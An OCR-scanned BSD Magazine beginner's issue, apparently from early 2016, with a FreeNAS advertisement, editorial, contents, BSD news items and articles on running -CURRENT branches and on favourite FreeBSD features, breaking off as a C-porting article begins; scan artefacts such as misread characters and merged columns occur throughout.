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HOW IMPORTANT IS YOUR DATA? 


Years of family photos. Your entire music 
and movie collection. Office documents 
you've put hours of work into. Backups for 
every computer you own. We ask again, how 
important is your data? 


NOW IMAGINE LOSING IT ALL 


Losing one bit - that’s all it takes. One single bit, ana 
your file is gone. 


The worst part? You won't know until you 
absolutely need that file again. Example of one-bit corruption 


THE SOLUTION 


The FreeNAS Mini has emerged as the clear choice to The Mini boasts these state-of-the- 
save your digital life. No other NAS in its class offers art features: 
ECC (error correcting code) memory and ZFS bitrot 
protection to ensure data always reaches disk + 8-core 2.4GHz Intel® Atom™ processor 
' . . - Up to 16TB of storage capacity 
without corruption and never degrades over time. . 16GB of ECC memory (with the option to upgrade 
to 32GB) 
No other NAS combines the inherent data integrity - 2x 1 Gigabit network controllers 


- Remote management port (IPM) 


. . + Tooltess design; hot swappable drive trays 
encryption. No other NAS provides comparable power » FreeNAS installed and configured 


and flexibility. The FreeNAS Mini is, hands-down, the 
best home and small office storage appliance you can 
buy on the market. When it comes to saving your 
important data, there simply is no other solution. 


and security of the ZFS filesystem with fast on-disk 


systems 


FREENAS 


CERTIFIED 
STORAGE 


With over six million downloads, 
FreeNAS is undisputedly the most 
popular storage operating system 
in the world. 


Sure, you could build your own FreeNAS system: 
research every hardware option, order all the 

parts, wait for everything to ship and arrive, vent at 
customer service because it hasn't, and finally build it 
yourself while hoping everything fits - only to install 
the software and discover that the system you spent 
days agonizing over isn’t even compatible. Or... 


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS 
project, iXsystems has combined over 20 years of 
hardware experience with our FreeNAS expertise to 
bring you FreeNAS Certified Storage. We make it 
easy to enjoy all the benefits of FreeNAS without 
the headache of building, setting up, configuring, 
and supporting it yourself. As one of the leaders in 
the storage industry, you know that you're getting the 
best combination of hardware designed for optimal 
performance with FreeNAS. 


Every FreeNAS server we ship is... 


» Custom built and optimized for your use case 

» Installed, configured, tested, and guaranteed to work out 
of the box 

» Supported by the Silicon Valley team that designed and 
built it 

» Backed by a 3 years parts and labor limited warranty 


http://www.iXsystems.com/storage/freenas-certified-storage/ 


As one of the leaders in the storage industry, you 
know that you're getting the best combination 

of hardware designed for optimal performance 

with FreeNAS. Contact us today for a FREE Risk 
Elimination Consultation with one of our FreeNAS 
experts. Remember, every purchase directly supports 
the FreeNAS project so we can continue adding 
features and improvements to the software for years 
to come. And really - why would you buy a FreeNAS 
server from anyone else? 


FreeNAS 1U 

« Intel* Xeon* Processor E3-1200v2 Family 

+ Up to 16TB of storage capacity 

* 16GB ECC memory (upgradable to 32GB) 

+ 2x 10/100/1000 Gigabit Ethernet controllers 
- Redundant power supply 


FreeNAS 2U 
+ 2x Intel* Xeon* Processors E5-2600v2 Family 
+ Up to 48TB of storage capacity 
+ 32GB ECC memory (upgradable to 128GB) 
- 4x 1GbE Network interface (Onboard) - 
(Upgradable to 2 x 10 Gigabit Interface) 
- Redundant Power Supply 


EDITORS’ WORD 


Dear Readers, 


We hope you have had a wonderful time this December. The 
New Year is coming together with new opportunities, many 
changes (hopefully for better) and new hopes. We hope you had 
a great New Year's Eve and an amazing beginning of 2016. 


This issue is our “Beginner's Guide”. You will find here a couple 
of new articles together with the best articles of 2015. 


We will start with an introduction to “BSD - Current is usable 
daily” by David Carlier and “Ten Things | like about FreeBSD” by 
David Martinez. 


The FreeBSD section belongs to David Carlier. You will find four 
of his articles and “The Basics of The GDB Debbuger on 
FreeBSD 10” by Carlos Neira. 


In the NetBSD chapter, we will start with “NetBSD Introduction” 
by Siju George. Carlos Neira will explain how to install NetBSD 
on your Raspberry Pi. 


“What is the difference between TrueNAS and FreeNAS?” by 
Brett Davis will open the FreeNAS section. The first part of the 
article series “A complete guide to FreeNAS Hardware Design: 
purposes and best practices” by Josh Paetzel and “FreeNAS: A 
worst practice guide’ by Mark VonFange will complement the 
chapter. 


Next, a small break with the New Year's Crossword will let you 
take a couple of breaths. 


After the break, we will start with Unix Basics by Samanvay 
Gupta. Next we will move to “Best Practices in UNIX Access Con- 
trol with SUDO” by Leonardo Neves Bernardo. Would you like to 
know “How to start terminal on UNIX"? Read Nitin Kanoijas arti- 
cle! We will close this topic with “What is PAM and why do | 
care?” by Andrey Mosktvitin. 


Next is “How about some Raspberry Pi?” by Jerry Craft. 


Learn about “Cloud service in a developer point of view” thanks 
to David Carlier's article and “Patterns for cloud integration” with 
Mohamed Farang. 


Are you a fan of Hadoop? Read a great article on “How to deploy 
a multi-node Hadoop cluster solution on FreeBSD 10.2 with 
OpenJDK8" by Pedro Marcelo. 


Small lesson of Python Programming with Rui Silva. It is a begin- 
ner's guide, right? 


Than we move on to the second article by Damian Czernous 
“Model View Whatever - MVC’s model evolution’. 


For dessert, we give you an Interview with OPNSense and Rob’s 
Column. 
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CONTENTS 


News 


BSD World Monthly News re 


by Marta Ziemianowicz 


This column presents the latest news coverage of 
breaking news events, products releases and trend- 
ing topics (from December 2015). 


BSD 
BSD -CURRENT is Usable Daily 14 
by David Carlier 


Running the development branch of a *BSD daily 
might sound scary. Indeed, this is basically experi- 
mentation land and this use case seems to apply only 
to BSD developers—the internal APIs might suddenly 
change because they need to and some bugs can be 
fixed. But some new ones can be introduced without 
notice ... Although, in general, the community is quite 
reactive and fixes them fairly quickly. David will ex- 
plain the reasons of using what is called the -CUR- 
RENT branches. 


The FreeBSD Corner 


Ten Things That | Like About FreeBSD 17 
by David Martinez 


since the first time | used FreeBSD, | felt in love with 
this system. It's a very robust and modern operating 
system with very good documentation, mostly central- 
ized. 


The Journey of a C Developer in the FreeBSD 
World 20 


by David Carlier 


Moving from Linux to FreeBSD involves quite a num- 
ber of changes; some gains and some losses. As a 
developer for most of the programming languages, 
especially the high level ones, there are no meaning- 
ful disturbing changes. But for languages like C (and 
its sibling C++), if you want to port your software, li- 
braries, etc., some points need to be considered. 


Development Tools on FreeBSD 2i 
by David Carlier 


lf you're usually programming on Linux and you are 
considering a potential switch to FreeBSD, this article 
will give you an overview of the possibilities... 


The Basics of the GDB Debugger on FreeBSD 32 
by Carlos Neira 


To be able to inspect a program more easily, we need 
to have the symbol table available for the program we 
intend to debug. This is accomplished using the —g 
flag of the compiler we are going to use (we could 
also debug it without the —g flag but it is really cum- 
bersome sometimes). In our case, we will use 
FreeBSD 10 as the platform and the clang compiler 
that comes with it. 


NodeJS and FreeBSD - Part 1 58 


by David Carlier 


NodeJS is well known to allow building server applica- 
tions in full JavaScript. In this article, we'll see how to 
build NodeJS from source code on FreeBSD. You will 
need autoconf tools, GNU make, Python, linprocfs en- 
abled and libexecinfo installed. GCC/G++ compiler 
suite (C++11 compliant, ideally 4.8 series or above) 
or possibly clang can be used to compile the whole 
source. 


OpenBSD 
OpenBSD 5.8, Special Release- NEW 65 
by David Carlier 


Indeed, this release is special, mainly because it was 
to celebrate the 20th anniversary of existence of 
OpenBSD, hence it was out before the usual sched- 
ule (18th of October, for instance). It, of course, 
comes with many new interesting features. 


NetBSD 


NetBSD Introduction 13 
by Siju George 


The objective of this article is to introduce the 
NetBSD operating system to people who are new to 
BSDs. The NetBSD project began as a result of frus- 
tration within the 386BSD developer community with 
the pace and direction of the operating 
system's development. 
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Installing NetBSD on Your Raspberry Pi 19 


by Carlos Neira 


If you haven't heard of this mini computer, well, you 
are in for a surprise. The Raspberry Pi 2 Model B is 
the second generation Raspberry Pi. A Raspberry Pt 
2 is the size of a credit card and comes with ARMv/ 
Cortex running at 900 Mhz with 1GB of RAM. That 
means you can install these operating systems on it: 
NetBSD, FreeBSD, RISC OS, Plan9, AROS, Linux 
and Windows 10 loT Core. 


FreeNAS 


~What's the Diference Between TrueNAS and Fre- 
eNAS? “ 86 


by Brett Davis 


If you look at the software feature list, there aren't a 
ton of differences. So really....what’s the difference? 


A Complete Guide to FreeNAS Hardware Design, 


Part |: Purpose and Best Practices 89 
by Josh Paetzel 


A guide to selecting and building FreeNAS hard- 
ware, written by the FreeNAS Team, is long past 
overdue by now. For that, we apologize. The issue 
was the depth and complexity of the subject, as you 
will see by the extensive nature of this four part 
guide, due to the variety of ways FreeNAS can be 
utilized. 


FreeNAS: A Worst Practices Guide 92 


by Mark VonFange 


There are many best practices guides for managing 
storage solutions out there, but a lot of how you ad- 
minister your storage depends on your specific use 
case and what youre trying to accomplish. While we 
have created a best practices for FreeNAS, we also 
decided to take a look at what you don't want to do. 


Christmas / New Years Crossword 97 
Unix 

UNIX Basics 104 
by Samanvay Gupta 


UNIX United is the architecture for a distributed sys- 
tem based on UNIX. Any program written for a nor- 
mal UNIX system can be transparently extended to 
exploit the richer environment of UNIX United. As it 
relies on having a UNIX system beneath it, the imple- 
mentation of UNIX United is called the Newcastle 
Connection. Samanvay explains the basic semantics 
of UNIX United and is followed by that of the architec- 
ture implied by the protocol between components in 
a UNIX United system, network basics and of a soft- 
ware structure appropriate to the architecture and 
the protocol. 


Best Practices in UNIX Access Control with 
SUDO 117 


by Leonardo Neves Bernardo 


This article will discuss security related issues in 
sudo environments. Advantages and disadvantages 
of centralizing sudo with LDAP back-end will be 
evaluated. Another issue summarized in this article 
is about taking care with content of sudo registers. 


UNIX - How To Start Terminal? 140 
by Nitin Kanoija 


UNIX is a multi-user operating system that is avail- 
able in many flavors, like Oracle Solaris, HP UNIX, 
IBM AIX, FreeBSD, and MacOS. It was developed 
by Ken Thompson and Dennis Ritchie at AT&T Bell 
Laboratories in the late 1960s. In 1978, AT&T's UNIX 
seventh edition was split off into Berkeley Software 
Distribution (BSD). This version of the UNIX environ- 
ment was sent to other programmers around the 
country, who added tools and code to further en- 


hance BSD UNIX. S 
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What is PAM and Why Do | Care? 148 Patterns for Cloud Integration 193 

by Andrey Mosktvitin by Mohamed Farag 

Pluggable Authentication Modules (PAM) are the Recent statistics show that 90% of businesses have 

main mechanism for Linux, as well as other Unix sys- adopted at least one cloud application. 56% of enter- 

tems, that perform the authentication of the user prises are still identifying IT operations that are candi- 

every time they log in. PAM can be configured in a dates for cloud hosting. However, a recent survey, 

number of ways in order to authenticate the user in a that was conducted by IDG Enterprise across 1600 

variety of means, such as using passwords, SSH IT decision makers, reflects that 46% of survey par- 

keys, smart cards, etc. ticipants consider cloud integration as one of the ma- 
jor disconnects that hold organizations from going to 

Raspberry Pi the cloud. 

How About Some Raspberry Pi? 155 Hadoop 

by Jerry Craft How to Deploy a Multi-node Hadoop Cluster Solu- 


| tion on FreeBSD 10.2 with OpenJDK8 - NEW 202 
The love for figuring out how a computer functioned 


wasnt part of the college application. Eben discov- by Pedro Marcelo 
ered kids were no longer writing programs and tak- 
ing apart circuit boards. Instead, they were playing Hadoop is a piece of software that allows you to proc- 
video games or using the family computers to update ess big quantities of data, chunk it to small parts, 
MySpace/Facebook posts. Kids didn't have access send it to many computers for processing, check if 
to a computer they could blow up or really get into any of them breaks during this process, recover the 
and discover how a computer functions. The hacking missing unprocessed data to a certain limit, put all 
instinct was gone. Instead, kids going into college for parts back together, then, give you your answer. 
computer science were “..consumers of computers.” 
(Mann) Python 
Cloud Python Programming: The csv and json Python 

Module 222 
Cloud Service in a Developer Point of View 1/1 

by Rui Silva 
by David Carlier 

Files are a big part of programming. We use them for 
In this article, we will have an overview of writing a a lot of things. HTML files have to be loaded when 
cloud service. Various ways exist to achieve your serving a web page. Some applications export files 
goals; we will focus on one which is memory effi- in some formats that we need to read in other appli- 
cient, multiplatform (POSIX systems), multi-language cations, or sometimes we want to be the ones doing 
(from C++ to Erlang), and reasonably fast. It is the exporting. In this article, we will learn some con- 
Apache Thrift. | recently, from top to bottom, wrote a cepts to help us understand how to use files and 
cloud service and it worked reliably. also some advanced ways of making use of them. 
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GUI 


Model View Whatever - MVC’s Model Evolution - 
NEW 235 


by Damian Czernous 


The structure of the MVC is quite complex. Every as- 
pect of M, V and C relates mutually to each other 
and every association has a well defined purpose. 


Interview 


OPNSense 241 


by Marta Ziemianowicz & Marta Strzelec 


Rob’s Column 249 


by Rob Somerville 


Many years ago, a colleague lamented that “Comput- 
ers are never like cars — reliable and consistent’. A 
classic book by Stewart Brand — How Buildings 
Learn — argues that, if allowed to, human artifacts, 
like buildings, can and do evolve. So what, if any- 
thing, can the IT technology industry learn from this 
ancient trade? 
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BSD Certification 


The BSD Certification Group Inc. 
(BSDCG) is a non-profit organization 
committed to creating and 
maintaining a global certification 
standard for system administration 
on BSD based operating systems. 


® WHAT CERTIFICATIONS ARE AVAILABLE? 


BSDA: Entry-level certification suited for candidates 
with a general Unix background and at least six months of 
experience with BSD systems. 


BSDP: Advanced certification for senior system administrators 
with at least three years of experience on BSD systems. 
Successful BSDP candidates are able to demonstrate 

strong to expert skills in BSD Unix system administration. 


@ WHERE CAN I GET CERTIFIED? 


We’re pleased to announce that after 7 months of 
negotiations and the work required to make the exam 
available in a computer based format, that the BSDA 
exam is now available at several hundred testing centers 
around the world. Paper based BSDA exams cost $75 USD. 
Computer based BSDA exams cost $150 USD. The price of 
the BSDP exams are yet to be determined. 


Payments are made through our registration website: 
https://register.bsdcertification.org//register/payment 


@_ WHERE CAN I GET MORE INFORMATION? 


More information and links to our mailing lists, LinkedIn 
‘groups, and Facebook group are available at our website: 
http://www.bsdcertification.org 


Registration for upcoming exam events is available at our 
registration website: | 


https://register.bsdcertification.org//register/get-a-bsdcg-id — 


VDI comes to the Raspber 


Citrix HDX and ThinLinx deliver super-cheap 
endpoints and flawless 1080p 


The Rasp- 
berry Pi is 
Now a 
threat to 
thin clr- 
ents. 


Citrix has 
been fool- 
ing around with the Pi as a desktop virtualization 
(VDI) target for a while, even releasing a prototype 
Citrix Receiver for the little computers. That effort 
was in early 2014. 


Citrix has since decided it was inefficient to put a lot 
of effort into creating a special version of Receiver 
for one device, so instead set to “working with the Pi 
Organization to ensure our existing Linux Receiver 
would work with their new Pi2 architecture and sup- 
ported OS images.” 


The result of that effort, the company blogged last 
Friday, is that in “XenDesktop/XenApp 7.6 FP3 and 
the new HDX Thinwire compatibility codec, we ... 
had a codec that would perform efficiently on the 
Pi2 without the need for hardware accelerated plug- 
ins.” 


The other piece of the puzzle is ThinLinx, an outtfit 
that makes a US$10 Thin Client & Digital Signage 
Operating System for the rPi. 


http://www.theregister.co.uk/2015/12/14/vdi_ comes _ 
to_the_raspberry_pi/ 
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BSDCan 2016 is being held Ottawa, Canada, and is currently open for registration, including a 
call for papers. 


BSDCan has quickly established itself as the technical conference for people working on and with 
4.4BSD based operating systems and related projects. The organizers have found a fantastic for- 
mula that appeals to a wide range of people, from extreme novices to advanced developers. 


BSDCan 2016 will be held on 10-11 June 2016 (Fri/Sat) at University of Ottawa in the DMS (Des- 
marais) building, and will be preceded by two days of Tutorials on 8-9 June 2016 (Wed/Thu). See 
our map for details. 


https://www.freebsdnews.com/2015/12/18/bsdcan-2016-bsd-conference/ 


en Michael W. Lucas ts here with another book, this one titled FreeBSD 
ix eS as’ » eg 2 Mastery: Specialty Filesystems. The book is not final, however, it can 
. Specialty, Filesystem | be purchased at a discounted price. 


: : ie 
: . - | 


FreeBSD includes many special-purpose filesystems to address any 
“)$ number of use cases. FreeBSD Mastery: Specialty Filesystems takes 

“= you through these filesystems, helping you solve problems you didn’t 
*%) Know you have. These filesystems underlie everything from application 
~ servers to jails. 


httos://www.freebsdnews.com/2015/12/18/freebsd-mastery-specialty-filesystems-early-access/ 


BSD 


ce) 
MAGAZINE 


A white boxer is working with SanDisk to flog flash arrays, making SanDisk even more desirable 
to WDC. 


Taiwan-based Quanta, actually Quanta Cloud Technology (QCT), along with Foxcon and SuperMi- 
cro, is a so-called “white box” computer supplier, making notebooks, servers and switches to be 
branded by its customers. Apple is one of its customers, and Amazon, Dell and HP are others. 


NAND component and system 
supplier SanDisk is being bought 
by WDC for $19bn, and has devel- 
oped an InfiniFlash array, charac- 
terized as a JBOF, Just a Box of 
Flash, and, like a JBOD, lacking 
array controller hardware and soft- 
ware. Pricing is said to start at 
less than $1/GB for the raw flash 
box, before any data reduction 
software or hardware functionality 
is added. 


It is partnering with CloudByte, Nexenta and Tegile to develop complete controller HW + SW + 
JBOF systems usable by customers. 


An InfiniFlash array offers up to 512TB of capacity in a 3U enclosure, using 8TB InfiniFlash cards, 
meaning up to 6PB per rack. With flash chip density increasing, we can expect this to double. 
This means it can be used for high-capacity all-flash array use cases. Quanta and SanDisk are 
looking at pairing Quanta servers with InfiniFlash for OpenStack and Ceph environments, hy- 
perscale ones, and saying they can provide “massive scale, efficiency, and resiliency.” 


htto://www.theregister.co.uk/2015/12/23/white boxer joins flash array wars sandisk quanta/ 
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Robert N. M. Watson of Cambridge University and George V. Neville-Neil have announced a se- 
ries of computer science courses at TeachBSD.org that are based on FreeBSD and their book, 
The Design and Implementation of the FreeBSD Operating System. This graduate-level curricu- 
lum includes freely-available teaching materials including handouts, lecture slides and lab pro- 
jects. 


Courses on complex systems, such as the FreeBSD Operating System, provide students with a 
clearer understanding of how such systems ought to work in theory, how they actually work in 
practice, and how to design experiments to tell the difference between the two. 


These courses are applicable to both University students and practitioners of software engineer- 
ing. 


The preferred text for the course is The Design and Implementation of the FreeBSD Operating 
system, 2nd Ed. 


http://teachbsd.org 


The Raspberry Pi Foundation made a shocking 
revelation; someone has offered cash to install a 
malware into its tiny computers. 


Yes, the news is unbelievable, but Liz Upton, the 
Foundations director of communications, dis- 
closed the content of an email from a “business 
officer’ called Linda, who promised a “price per in- 
stall” for a suspicious executable file. 


“Amazing. This person seems to be very sincerely offering us money to install malware on your 
machines, said Liz. 


The name of the company represented by Linda was not disclosed, anyway the news is discon- 
certing. 


htto://securityaffairs.co/wordpress/43024/malware/pay-to-infect-raspberry-devices.html 
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The storage market in 2015 went through strategic foundation-shaking turmoil as the external 


shared disk array storage playbook was torn to shreds. 


s Point Structure 


Selector 


Volatile 


ee 4 de ; 
' | 
e f . 
High Endurance alll o~ . 
| Pome" Memory Cell 


htto://www.theregister.co.uk/2015/12/25/storage 2015/ 


lt was a bewildering year, with ram- 
paging and revolutionary activity at 
all levels of the industry. It's best 
looked at from the ground up. 


We look at technology visions and 
galloping media development 
here. Part two of this review of stor- 
age events in 2015 will Cover sys- 
tems, applications and suppliers. 
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BSD - Current 


BSD - Current 


by David Carlier 


Running the development branch of a *BSD daily might 
sound scary. Indeed, this is basically the experimentations’ 
land and this use case seems to apply only to BSD develop- 
ers ... The internal APls might suddenly change because 
they need to, some bugs can be fixed. But some new ones 
can be introduced without notice ... Although, in general, the 
community is quite reactive and fixes them fairly quickly. | 
am going to talk about the BSDs I| know and use the most, 
and will explain the reasons for using what it is called the 


-CURRENT branches. 


1. Innovation 


One of the main reasons which | use -CUR- 
RENT branches is simply having the last inno- 
vations. In the case of FreeBSD, having the 
very last version possible of clang because | 
am following the coming of some expected 
features, like OpenMP support and sanitizers 
support; because of the compilation effective- 
ness improvements, and so on. As | often use 
virtualized environments, having the last 
bhyve features is a very good point. From a 
developer point of view, it is important to have 
new syscalls, like explicit_bzero (which can 
be prefered in place of memset for some use 
cases, avoiding the potential compiler optimi- 
zation ...), or ppoll for the Linux emulation 


14 


layer. Casperd provides some services not 
available in capsicum's capabilities mode, 
hence can be seen as a proxy, for example, 
for DNS resolution. 


For OpenBSD, having the last relayd/httpd fea- 
tures interests me (i.e., | run a custom version 
of relayd which produces some additional cus- 
tom HTTP headers). | appreciate their “back- 
ward compatibility breaking fearless for the 
better good” approach (the recent change in 
random C API, for example, could confirm it). 
Indeed, since the 5.6, the static Position Inde- 
pendant Executable support for base system 
binaries was added, the legacy deterministic 
rand C API was strongly updated. And so on... 
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BSD - Current 


| recently retried NetBSD, with LLVM/clang in 
base following their willingness to move to- 
wards it. After some days of usage, | noticed a 
general light performance drop (one of my cus- 
tom applications got something like 5/10 per- 
cent of difference) but it is a generally well 
known problem with clang; it is improving 
through the releases. 


At last, DragonflyBSD recently brought GCC 
5.0 in base (with a bunch of new sanitization 
flags, in addition to the OpenMP 4.0 specifica- 
tions support). Also more generally a lot of ef- 
forts are made in the graphic stack. Having 
the last fixes for Hammer filesystem is worth- 
while (i.e Hammerz2 is. still not production 
ready). 


One of the downsides of running current is if 
you're using a desktop environment or, more 
generally, the ports system. Indeed, in gen- 
eral, when a significant change in the base 
system occurs, it is recommended to rebuild 
all the ports afterwards. The time needed to 
do so could be potentially quite important, es- 
pecially with software like KDE, Gnome 3. It is 
a point to consider ... 


For FreeBSD -CURRENT, | very rarely run a 
desktop, | prefer to use the whole potential 
CPU/memory for compiling the system in- 
stead. Also, the fact that | enable a significant 
amount of debugging kernel options, which 
slow down the general performance (like WIT- 
NESS (to detect potential deadlocks) / INVARI- 
ANTS (which add more kernel level's asser- 
tion) flags) stops me considering it. Those spe- 
cific options are only useful for developers or 
beta testers though, and it is advised to dis- 
able them otherwise. 


In the case of OpenBSD -CURRENT, | run 
time in time the base cwn which is very light 
and xorg (called xenocara) is not in the ports 
but in the base system; that makes those up- 
dates easier. In addition, | enable MAL- 
LOC_STATS, hence allowing the D flag for 
MALLOC OPTIONS for debugging purpose 
at the cost of a performance hit. Again, this 
last one is not recommended if you are not a 
developer. 


From a company point of view, if a new fea- 
ture is genuinely needed and if it is not possi- 
ble to do it internally, the sponsoring might be 
considered as an option. 


2. Bug acceptability level 


Indeed, the -CURRENT branches introduce 
potentially some new bugs. In the case of 
FreeBSD, for example, recently the Random 
Number Generator framework change, which 
was made pluggable, was found to be broken. 
Instead of coming back to the previous ver- 
sion, which sounds less risky, the issue was 
fixed ... | personally prefer this kind of ap- 
proach. In my side, | run FreeBSD with some 
local fixes (for bsdgrep, for example), some 
were merged upstream, hopefully some oth- 
ers will be in the near future. 


In the case of OpenBSD, the new XHCI driver 
(for USB 3.0) still does not work totally; for ex- 
ample, recently a memory leak was found in 
dhclient (but fixed) ... But nothing really major, 
OpenBSD -CURRENT is runnable daily as 
well. 
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BSD - Current 


DragonflyBSD had memory leaks in the ker- 
nel and in the hammer filesystem ... Once 
again, they were fixed promptly. 


The bug “acceptability” level depends on if 
youre willing to take the time to patiently 
make explicit bug reports in case the bug in 
question is blocking, or fixing them internally 
and pushing those fixes upstream. But there 
is no support to expect, again a point to con- 
sider well. 


3. Contribution 


Most of the contributions are done in the 
-CURRENT branches. That makes perfect 
sense as the -CURRENT branches are the 
perfect areas for both fixes and innovative fea- 
tures adding disruptive changes whereas the 
releases/stables welcome the fixes only. It 
also makes more sense for -CURRENT that 
recompiling the system is the natural usage. 


lf you are a quite advanced BSD user, and 
you wish to contribute to make them better for 
the whole community, then using those devel- 
opment branches can be considered. There 
are many areas, not only purely — 
technical (like the documenta- § 
tion), which can be improved. | 


DragonflyBSD uses git inter- § 
nally and due to its branching 
model, it is pretty handy to cre- # 
ate a proper diff to submit it for | 
review. 


4. Conclusion 


Most companies stick to stable/ — 
release versions with only secu- | 
rity fixes. Indeed, if your applica- 
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tions rely on specific API/ABI versions, it is in- 
deed better to keep on doing it. 


somehow, few others run experimental 
branches. Indeed, for example, Yahoo uses 
FreeBSD -CURRENT internally for their serv- 
ers. 


Regarding the short life release cycle chosen 
by OpenBSD with its fair amount of disruptive 
changes (i.e., every 6 months), hence it is 
less surprising to find users using develop- 
ment branch. 


| recompile quite often FreeBSD / OpenBSD 
base systems but for someone who has no in- 
terest at all for doing it, some snapshots 
builds are made fairly often ... 


saying that, it is advised to be registered in 
the relevant mailing lists 


freebsd-current@freebsd.org, 
tech@openbsd.org, tech@netbsd.org, 
commits@dragonflybsd.org 
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Ten things that I like of FreeBSD 


by David Martinez 


Since the first time | used FreeBSD, | felt in love with this 
system. It's a very robust and modern operating system 
with very good documentation, mostly centralized. 


1. Berkeley Software Distribution. Almost all important subjects about installa- 
The BSD license tion, configuration and management are cov- 
The Berkeley Software Distribution (BSD) li- ered in the FreeBSD handbook 
cense is one of the most liberal licenses that | (httos://www.freebsd.org/doc/en/books/handb 
know and it has the benefit of allowing you to ook/). The handbook is very useful to take a 
mix pieces of software with this license with first approach about a topic but you may need 
others pieces of software with other licenses, to extend that information with the man 
like GPL, or even with proprietary code. The pages. The man pages are extensive and 
FreeBSD copyright is derived from BSD Ii- come with some history and examples, too. 
cense 
https://www.freebsd.org/copyright/freebsd-lice 7 GY GRE A Ae PeeCRS,. WIG ane 
nee ical book, the manpages, books and articles, web 

resources and more at 

2. Documentation httos://www.freebsd.org/docs.html and also 

you can install the package en-freebsd-doc to 
The FreeBSD Documentation Project install all the docs in the /usr/local/share/doc/ 


(https://(www.freebsd.org/docproj/) is responsi- freebsd/ directory. 
ble for creating and reviewing all documenta- 


tion and, as like each project within FreeBSD, 
is IN continuous improvement. 
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3. Separate base system from the user 
added applications 


In FreeBSD one of the things that differ from 
most Linux(R) distributions is the structure of 
the base system. Everything that does not be- 
long to the base system is under the directory 
/usr/local. For example, you have two /etc di- 
rectories. One on the root /etc that contains 
every configuration of the base system, The 
other in /usr/local/etc that contains all the con- 
figuration files of the applications installed 
apart from the base system. The same occurs 
with other directories, like /usr/bin, /usr/lib, 
etc. 


This separation between the user applications 
and the base system is good for me because | 
think it is easy to understand the system con- 
figuration in this manner and if you have the 
files located and you understand what every 
one of the files in the system do, then you can 
administer the system better, you can have 
more security, you can have a better permis- 
sions structure and you can know in the easi- 
est way what file belongs to the base system 
and what does not. 


Everything of this can be configured in every 
Linux(R) distro but is not the default configura- 
tion in most of them. 


4. The FreeBSD ports collection 


Maybe the most famous feature of FreeBSD 
is the ports collection. More than twenty five 
thousand packages are ready to download 
from the source, patched to compile on 
FreeBSD and to be installed with a few com- 
mands. For example, if you want to install vim 
software, you have to cd /usr/ports/editors/vim 
and type make install. The source code of the 
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software and every dependency needed will 
be downloaded, compiled and installed. 


Every software in the /usr/ports of FreeBSD 
have their own maintainer, with specific re- 
sponsabilities on it. If you want to contribute 


(https://www.freebsd.org/doc/en/articles/contri 
buting/ports-contributing.html), they are a list 
of unmaintained ports 

(http://portsmon.freebsd.org/portsprsunmainta 
ined.py). A list of unmaintained ports and their 
current errors and problem reports can be 
seen at the FreeBSD Ports Monitoring Sys- 


tem (http://portsmon.freebsd.org/). 


some package managers are being imple- 
mented along the history of FreeBSD, but 
since the 10.0 version, the “pkg’ command 
has replaced the other pkg commands 
pkg_info, pkg_ install, etc. With pkg, you can, 
search, install and upgrade the packages, 
with the binary version, the fastest and easi- 
est way. 


5. Upgrading the system 


FreeBSD has improved its system upgrades 
over the years. Finally, with a single com- 
mand, this is freebsd-update, you can down- 
load the updates, apply and, if you are not sat- 
isfied, roll back. Note that the automatic up- 
date only works if you are using the default 
kernel configuration. However, there is an en- 
tire chapter in the FreeBSD handbook cover- 
Ing this 
(https://www.freebsd.org/doc/en/books/handb 
ook/updating-upgrading.html). It's so easy and 
so fast that you always will want to have your 
system updated. 
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6. Native ZFS + GELI — GEOM Disk En- 
cryption 

The file system's support is broad and varied 
in FreeBSD. Formerly, the Unix file system, 
UFS, was used by default. Now you can have 
ZFS with full disk encryption directly with the 
first installation. The ZFS file system has a 
modern and innovative design. It was ported 
from Solaris and the FreeBSD support and 
functionality has been improved over the last 
years. There is an entire chapter dedicated to 
ZFS in the handbook 
(https://www.freebsd.org/doc/en/books/handb 
ook/zts.html). | think the first thing you want to 
know is that ZFS is super fast, Super secure 
and super versatile. 


7. Firewalls. PF, IPFW and IPFilter 

PF is the OpenBSD packet filter. PF was 
ported to FreeBSD in the 5.3 version. Like 
everything in FreeBSD, the objective is to be 
fast without losing security. With PF, you can 
configure networks in almost all scenarios. 


Maybe Linux(R) iptables have some ad- 
vances features that PF don't, but | think the 
configuration is easier with PF. In FreeBSD, 
most things, to configure PF too, can be done 
by editing a single configuration file. However, 
FreeBSD has other firewalls, too. IFPFW is a 
firewall written specifically for FreeBSD and 
IPFilter is another open source firewall. You 
can read more in the chapter about firewalls 
in the handbook 


(https://www.treebsd.org/doc/handbook/firewa 
lls.Atml). 


8. Paranoid Security with securelevel 
FreeBSD securelevel is a security mechanism 
implemented in the kernel. It has five modes 


to boot. By default, FreeBSD boots in the 
most insecure level (-1). Root and even users 
with the appropriate permissions can do any 
modification in the system. As the level of se- 
curity increases, the permissions to do 
changes in the system are reduced. Not even 
the root account can do certain things. The 
chapter about security in the handbook 


(https://www.freebsd.org/doc/handbook/secur! 
ty.html) and the security(7) man page 


(https://www.freebsd.org/cgi/man.cgi?security) 
are good guides to know more about this 
topic. 


9. Linux(R) binary compatibility 
FreeBSD provides 32-bit binary compatibility 
with Linux. If it is enabled, you can execute 
32-bit Linux applications in FreeBSD. For ex- 
ample, Adobe doesn't provide Flash for 
FreeBSD, but there is a version for Linux. You 
can install the Linux binary of Mozilla Firefox 
with the Linux Adobe Flash plugin and run it 
on FreeBSD. Linux binary compatibility is not 
enabled by default but you can configure it 
whenever you need it 


(https://www.freebsd.org/doc/handbook/linuxe 
mu-lbc-install.html). 
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10. FreeBSD Community 
FreeBSD has a big community. You can check 
the home pages of the FreeBSD developers 
a ft 
https://www.freebsd.org/internal/nomepage.ht 
ml. 


If you need help and you can't find the answer 
in the archives of the mailing lists or in the fo- 
rums, you always can ask for help in the ap- 
propriate mailing list 

(https://www.freebsd.org/community/mailinglis 
ts.html) or you can post in the forums 


(https://forums.freebsd.org/). 


Conclusion 


FreeBSD is a complete, fully free and profes- 
sional operating system. Once you try it, you 
will not want to stop using it every day. 
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The Journey of a C Developer in 
FreeBSD’s World 


by David Carlier 


Moving from Linux to FreeBSD involves quite a number of 
changes; some gains and some losses. As a developer, for 
most of the programming languages, especially the high 
level ones, there are no meaningful disturbing changes. But 
for languages like C (and its sibling C++), if you want to port 
your software, libraries, etc., some points might need to be 


considered. 

What will you learn? What should you know ? 
How to move from Linux to ¢ Basic knowledge of C programming 
FreeBSD 


How to develop under FreeBSD 


1. The code 


As is often the case with C, it is not especially straightforward; the code itself might need some 
changes, minus the pure POSIX part. Let’s say your program needs to use some known network 
functions. 
